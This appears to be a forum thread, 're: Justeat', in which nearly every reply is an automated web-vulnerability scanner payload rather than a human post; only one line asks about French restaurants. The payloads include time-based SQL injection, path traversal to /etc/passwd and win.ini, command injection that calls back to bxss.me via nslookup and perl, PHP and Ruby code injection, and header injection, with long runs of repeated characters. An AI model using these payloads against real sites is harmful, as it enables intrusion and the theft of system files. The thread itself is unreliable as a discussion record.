-1 OR 2+338-338-1=0+0+0+1
re: Justeat
-1 OR 3+338-338-1=0+0+0+1
re: Justeat
if(now()=sysdate(),sleep(15),0)
re: Justeat
ipSbgQDm
re: Justeat
1*
re: Justeat
1*
re: Justeat
1*
re: Justeat
1*
re: Justeat
-1 OR 2+481-481-1=0+0+0+1
re: Justeat
-1 OR 3+481-481-1=0+0+0+1
re: Justeat
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
re: Justeat
if(now()=sysdate(),sleep(15),0)
re: Justeat
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
re: Justeat
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
re: Justeat
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: Justeat
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
re: Justeat
-1; waitfor delay '0:0:15' --
re: Justeat
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: Justeat
-1); waitfor delay '0:0:15' --
re: Justeat
-1; waitfor delay '0:0:15' --
re: Justeat
1 waitfor delay '0:0:15' --
re: Justeat
-1); waitfor delay '0:0:15' --
re: Justeat
42CVFaZW'; waitfor delay '0:0:15' --
re: Justeat
1 waitfor delay '0:0:15' --
re: Justeat
-5 OR 99=(SELECT 99 FROM PG_SLEEP(15))--
re: Justeat
KcFufStA'; waitfor delay '0:0:15' --
re: Justeat
-5) OR 580=(SELECT 580 FROM PG_SLEEP(15))--
re: Justeat
-5 OR 762=(SELECT 762 FROM PG_SLEEP(15))--
re: Justeat
-1)) OR 998=(SELECT 998 FROM PG_SLEEP(15))--
re: Justeat
-5) OR 957=(SELECT 957 FROM PG_SLEEP(15))--
re: Justeat
57Pxj9iO' OR 847=(SELECT 847 FROM PG_SLEEP(15))--
re: Justeat
-1)) OR 544=(SELECT 544 FROM PG_SLEEP(15))--
re: Justeat
zLtmE5A6') OR 657=(SELECT 657 FROM PG_SLEEP(15))--
re: Justeat
MqeSaCoh' OR 935=(SELECT 935 FROM PG_SLEEP(15))--
re: Justeat
WenomJqo')) OR 38=(SELECT 38 FROM PG_SLEEP(15))--
re: Justeat
W5v7kXC9') OR 322=(SELECT 322 FROM PG_SLEEP(15))--
re: Justeat
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: Justeat
mO6ruvg3')) OR 979=(SELECT 979 FROM PG_SLEEP(15))--
re: Justeat
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: Justeat
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: Justeat
'||(select 1 from (select pg_sleep(15))x)||'
re: Justeat
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: Justeat
''||(select 1 from (select pg_sleep(15))x)||''
re: Justeat
1'"
re: Justeat
@@kQVWw
re: Justeat
'||(select 1 from (select pg_sleep(15))x)||'
re: Justeat
''||(select 1 from (select pg_sleep(15))x)||''
re: Justeat
1'"
re: Justeat
@@9jFtM
re: Justeat
1hcPKB2AO
re: Justeat
response.write(9258744*9914667)
re: Justeat
'+response.write(9258744*9914667)+'
re: Justeat
%0abcc:074625.67-16677.67.5fdf7.19990.2@bxss.me
re: Justeat
"+response.write(9258744*9914667)+"
re: Justeat
to@example.com>%0d%0abcc:074625.67-16678.67.5fdf7.19990.2@bxss.me
re: Justeat
<esi:include src="http://bxss.me/rpb.png"/>
re: Justeat
../../../../../../../../../../../../../../etc/passwd
re: Justeat
../../../../../../../../../../../../../../windows/win.ini
re: Justeat
${9999925+9999994}
re: Justeat
file:///etc/passwd
re: Justeat
../../../../../../../../../../../../../../../proc/version
re: Justeat
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
re: Justeat
../../../../../../../../../../etc/passwd%00.jpg
re: Justeat
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg
re: Justeat
/../..//../..//../..//../..//../..//etc/passwd%00.jpg
re: Justeat
.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd
re: Justeat
/etc/passwd
re: Justeat
echo cdslpn$()\ qjmlpn\nz^xyu||a #' &echo cdslpn$()\ qjmlpn\nz^xyu||a #|" &echo cdslpn$()\ qjmlpn\nz^xyu||a #
re: Justeat
%2fetc%2fpasswd
re: Justeat
&echo ursdbe$()\ jobmne\nz^xyu||a #' &echo ursdbe$()\ jobmne\nz^xyu||a #|" &echo ursdbe$()\ jobmne\nz^xyu||a #
re: Justeat
)
re: Justeat
/.././.././.././.././.././.././.././../etc/./passwd%00
re: Justeat
|echo pfhipt$()\ wnokeo\nz^xyu||a #' |echo pfhipt$()\ wnokeo\nz^xyu||a #|" |echo pfhipt$()\ wnokeo\nz^xyu||a #
re: Justeat
!(()&&!|*|*|
re: Justeat
../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd
re: Justeat
(nslookup hituimayfpsyy65659.bxss.me||perl -e "gethostbyname('hituimayfpsyy65659.bxss.me')")
re: Justeat
^(#$!@#$)(()))******
re: Justeat
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd
re: Justeat
$(nslookup hitythroovmszcac4f.bxss.me||perl -e "gethostbyname('hitythroovmszcac4f.bxss.me')")
re: Justeat
../././../././../././../././../././../././../././../././../././../././etc/passwd
re: Justeat
&nslookup hitvhusajbemk5efc7.bxss.me&'\"`0&nslookup hitvhusajbemk5efc7.bxss.me&`'
re: Justeat
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afetc/passwd
re: Justeat
&(nslookup hitlxdvlhzvxh4ac67.bxss.me||perl -e "gethostbyname('hitlxdvlhzvxh4ac67.bxss.me')")&'\"`0&(nslookup hitlxdvlhzvxh4ac67.bxss.me||perl -e "gethostbyname('hitlxdvlhzvxh4ac67.bxss.me')")&`'
re: Justeat
invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.
re: Justeat
|(nslookup hitboizqxrdbm551d8.bxss.me||perl -e "gethostbyname('hitboizqxrdbm551d8.bxss.me')")
re: Justeat
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%3F.jpg
re: Justeat
file:///etc/passwd
re: Justeat
`(nslookup hitibhkcmfvmpa8f7c.bxss.me||perl -e "gethostbyname('hitibhkcmfvmpa8f7c.bxss.me')")`
re: Justeat
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%00.jpg
re: Justeat
/\../\../\../\../\../\../\../etc/passwd
re: Justeat
;(nslookup hitxkuykyhkxgf09b8.bxss.me||perl -e "gethostbyname('hitxkuykyhkxgf09b8.bxss.me')")|(nslookup hitxkuykyhkxgf09b8.bxss.me||perl -e "gethostbyname('hitxkuykyhkxgf09b8.bxss.me')")&(nslookup hitxkuykyhkxgf09b8.bxss.me||perl -e "gethostbyname('hitxkuykyhkxgf09b8.bxss.me')")
re: Justeat
Http://bxss.me/t/fit.txt
re: Justeat
/WEB-INF/web.xml
re: Justeat
http://bxss.me/t/fit.txt%3F.jpg
re: Justeat
C:\WINDOWS\system32\drivers\etc\hosts
re: Justeat
/etc/shells
re: Justeat
../../../../../../../../../../windows/win.ini%00.jpg
re: Justeat
c:/windows/win.ini
re: Justeat
/../../../../../../../../../../boot.ini
re: Justeat
bxss.me
re: Justeat
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afwindows%c0%afwin.ini
re: Justeat
'.gethostbyname(lc('hitfr'.'pvtvyedt6f85a.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(116).chr(86).chr(97).chr(72).'
re: Justeat
..\..\..\..\..\..\..\..\windows\win.ini
re: Justeat
".gethostbyname(lc("hitfc"."wtddrkqidd9c8.bxss.me."))."A".chr(67).chr(hex("58")).chr(122).chr(74).chr(103).chr(80)."
re: Justeat
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini
re: Justeat
/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini
re: Justeat
../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini
re: Justeat
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini
re: Justeat
unexisting/../../../../../../../../../../windows/win.ini.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\
re: Justeat
WEB-INF/web.xml
re: Justeat
HttP://bxss.me/t/xss.html?%00
re: Justeat
"+"A".concat(70-3).concat(22*4).concat(111).concat(77).concat(116).concat(80)+(require"socket"
Socket.gethostbyname("hitzk"+"uyhthcnte540b.bxss.me.")[3].to_s)+"
re: Justeat
WEB-INF\web.xml
re: Justeat
bxss.me/t/xss.html?%00
re: Justeat
'+'A'.concat(70-3).concat(22*4).concat(120).concat(81).concat(103).concat(75)+(require'socket'
Socket.gethostbyname('hitka'+'nddzfplmead0a.bxss.me.')[3].to_s)+'
re: Justeat
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
re: Justeat
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
re: Justeat
';print(md5(31337));$a='
re: Justeat
'"
re: Justeat
";print(md5(31337));$a="
re: Justeat
<!--
re: Justeat
${@print(md5(31337))}
re: Justeat
${@print(md5(31337))}\
re: Justeat
'.print(md5(31337)).'
re: Justeat
1
re: Justeat
1
re: Justeat
-1 OR 2+276-276-1=0+0+0+1 --
re: Justeat
-1 OR 3+276-276-1=0+0+0+1 --
re: Justeat
-1 OR 2+510-510-1=0+0+0+1
re: Justeat
-1 OR 3+510-510-1=0+0+0+1
re: Justeat
-1' OR 2+255-255-1=0+0+0+1 --
re: Justeat
-1' OR 3+255-255-1=0+0+0+1 --
re: Justeat
-1' OR 2+47-47-1=0+0+0+1 or 'Hsqo6Me4'='
re: Justeat
-1' OR 3+47-47-1=0+0+0+1 or 'Hsqo6Me4'='
re: Justeat
-1" OR 2+653-653-1=0+0+0+1 --
re: Justeat
-1" OR 3+653-653-1=0+0+0+1 --
re: Justeat
if(now()=sysdate(),sleep(15),0)
re: Justeat
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
re: Justeat
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
re: Justeat
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: Justeat
-1; waitfor delay '0:0:15' --
re: Justeat
-1); waitfor delay '0:0:15' --
re: Justeat
1 waitfor delay '0:0:15' --
re: Justeat
grTeaeCf'; waitfor delay '0:0:15' --
re: Justeat
-5 OR 161=(SELECT 161 FROM PG_SLEEP(15))--
re: Justeat
-5) OR 945=(SELECT 945 FROM PG_SLEEP(15))--
re: Justeat
-1)) OR 960=(SELECT 960 FROM PG_SLEEP(15))--
re: Justeat
6sn8nyTl' OR 775=(SELECT 775 FROM PG_SLEEP(15))--
re: Justeat
btRbkIKM') OR 907=(SELECT 907 FROM PG_SLEEP(15))--
re: Justeat
QZ95AGGG')) OR 904=(SELECT 904 FROM PG_SLEEP(15))--
re: Justeat
1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: Justeat
1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: Justeat
'||(select 1 from (select pg_sleep(15))x)||'
re: Justeat
''||(select 1 from (select pg_sleep(15))x)||''
re: Justeat
1'"
re: Justeat
@@Ek8q7
@leo saito any recommendation for no frill French restaruant like @su2021 mention? Thank yiu!
re: Justeat
UkP6TGDk
re: Justeat
1*
re: Justeat
1*
re: Justeat
1*
re: Justeat
1*
re: Justeat
-1 OR 2+754-754-1=0+0+0+1
re: Justeat
-1 OR 3+754-754-1=0+0+0+1
re: Justeat
if(now()=sysdate(),sleep(15),0)
re: Justeat
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
re: Justeat
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
re: Justeat
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: Justeat
-1; waitfor delay '0:0:15' --
re: Justeat
-1); waitfor delay '0:0:15' --
re: Justeat
eAVsWQNf
re: Justeat
1*
re: Justeat
1*
re: Justeat
1*
re: Justeat
1*
re: Justeat
-1 OR 2+258-258-1=0+0+0+1
re: Justeat
-1 OR 3+258-258-1=0+0+0+1
re: Justeat
1 waitfor delay '0:0:15' --
re: Justeat
if(now()=sysdate(),sleep(15),0)
re: Justeat
EDUdTGzf'; waitfor delay '0:0:15' --
re: Justeat
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
re: Justeat
-5 OR 982=(SELECT 982 FROM PG_SLEEP(15))--
re: Justeat
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
re: Justeat
-5) OR 329=(SELECT 329 FROM PG_SLEEP(15))--
re: Justeat
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: Justeat
-1)) OR 832=(SELECT 832 FROM PG_SLEEP(15))--
re: Justeat
-1; waitfor delay '0:0:15' --
re: Justeat
dHQr0M0i' OR 329=(SELECT 329 FROM PG_SLEEP(15))--
re: Justeat
-1); waitfor delay '0:0:15' --
re: Justeat
jDHmjNFQ') OR 421=(SELECT 421 FROM PG_SLEEP(15))--
re: Justeat
1 waitfor delay '0:0:15' --
re: Justeat
ogmAPnAN')) OR 716=(SELECT 716 FROM PG_SLEEP(15))--
re: Justeat
MZq25zaG'; waitfor delay '0:0:15' --
re: Justeat
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: Justeat
-5 OR 798=(SELECT 798 FROM PG_SLEEP(15))--
re: Justeat
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: Justeat
-5) OR 816=(SELECT 816 FROM PG_SLEEP(15))--
re: Justeat
'||(select 1 from (select pg_sleep(15))x)||'
re: Justeat
-1)) OR 621=(SELECT 621 FROM PG_SLEEP(15))--
re: Justeat
''||(select 1 from (select pg_sleep(15))x)||''
re: Justeat
1'"
re: Justeat
@@fqEHu
re: Justeat
VW3vPATL' OR 571=(SELECT 571 FROM PG_SLEEP(15))--
re: Justeat
aBpEMVwn') OR 255=(SELECT 255 FROM PG_SLEEP(15))--
re: Justeat
tuDn7Fhb')) OR 435=(SELECT 435 FROM PG_SLEEP(15))--
re: Justeat
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: Justeat
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: Justeat
'||(select 1 from (select pg_sleep(15))x)||'
re: Justeat
''||(select 1 from (select pg_sleep(15))x)||''
re: Justeat
1'"
re: Justeat
@@RnVM4
re: Justeat
1zKTbD4gO
re: Justeat
response.write(9354165*9622140)
re: Justeat
'+response.write(9354165*9622140)+'
re: Justeat
"+response.write(9354165*9622140)+"
re: Justeat
%0abcc:074625.67-16704.67.7f75d.19990.2@bxss.me
re: Justeat
to@example.com>%0d%0abcc:074625.67-16705.67.7f75d.19990.2@bxss.me
re: Justeat
../../../../../../../../../../../../../../etc/passwd
re: Justeat
../../../../../../../../../../../../../../windows/win.ini
re: Justeat
file:///etc/passwd
re: Justeat
<esi:include src="http://bxss.me/rpb.png"/>
re: Justeat
../../../../../../../../../../../../../../../proc/version
re: Justeat
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
re: Justeat
${9999182+9999565}
re: Justeat
../../../../../../../../../../etc/passwd%00.jpg
re: Justeat
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg
re: Justeat
echo vugrkq$()\ vgbehk\nz^xyu||a #' &echo vugrkq$()\ vgbehk\nz^xyu||a #|" &echo vugrkq$()\ vgbehk\nz^xyu||a #
re: Justeat
/../..//../..//../..//../..//../..//etc/passwd%00.jpg
re: Justeat
&echo mkpqiu$()\ gbnypp\nz^xyu||a #' &echo mkpqiu$()\ gbnypp\nz^xyu||a #|" &echo mkpqiu$()\ gbnypp\nz^xyu||a #
re: Justeat
.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd
re: Justeat
|echo noopya$()\ nxhvbd\nz^xyu||a #' |echo noopya$()\ nxhvbd\nz^xyu||a #|" |echo noopya$()\ nxhvbd\nz^xyu||a #
re: Justeat
/etc/passwd
re: Justeat
(nslookup hitwgtngeckcrd116b.bxss.me||perl -e "gethostbyname('hitwgtngeckcrd116b.bxss.me')")
re: Justeat
%2fetc%2fpasswd
re: Justeat
$(nslookup hitzvczrrdqad01cb4.bxss.me||perl -e "gethostbyname('hitzvczrrdqad01cb4.bxss.me')")
re: Justeat
/.././.././.././.././.././.././.././../etc/./passwd%00
re: Justeat
&nslookup hitkdumjifgqxa79c6.bxss.me&'\"`0&nslookup hitkdumjifgqxa79c6.bxss.me&`'
re: Justeat
../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd
re: Justeat
&(nslookup hitfuxyokxqcq5806f.bxss.me||perl -e "gethostbyname('hitfuxyokxqcq5806f.bxss.me')")&'\"`0&(nslookup hitfuxyokxqcq5806f.bxss.me||perl -e "gethostbyname('hitfuxyokxqcq5806f.bxss.me')")&`'
re: Justeat
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd
re: Justeat
)
re: Justeat
|(nslookup hitzdfcoeubul46916.bxss.me||perl -e "gethostbyname('hitzdfcoeubul46916.bxss.me')")
re: Justeat
../././../././../././../././../././../././../././../././../././../././etc/passwd
re: Justeat
!(()&&!|*|*|
re: Justeat
`(nslookup hiticqvezdorg19170.bxss.me||perl -e "gethostbyname('hiticqvezdorg19170.bxss.me')")`
re: Justeat
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afetc/passwd
re: Justeat
^(#$!@#$)(()))******
re: Justeat
;(nslookup hitfbmivjevef63850.bxss.me||perl -e "gethostbyname('hitfbmivjevef63850.bxss.me')")|(nslookup hitfbmivjevef63850.bxss.me||perl -e "gethostbyname('hitfbmivjevef63850.bxss.me')")&(nslookup hitfbmivjevef63850.bxss.me||perl -e "gethostbyname('hitfbmivjevef63850.bxss.me')")
re: Justeat
invalid../../../../../../../../../../etc/passwd/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././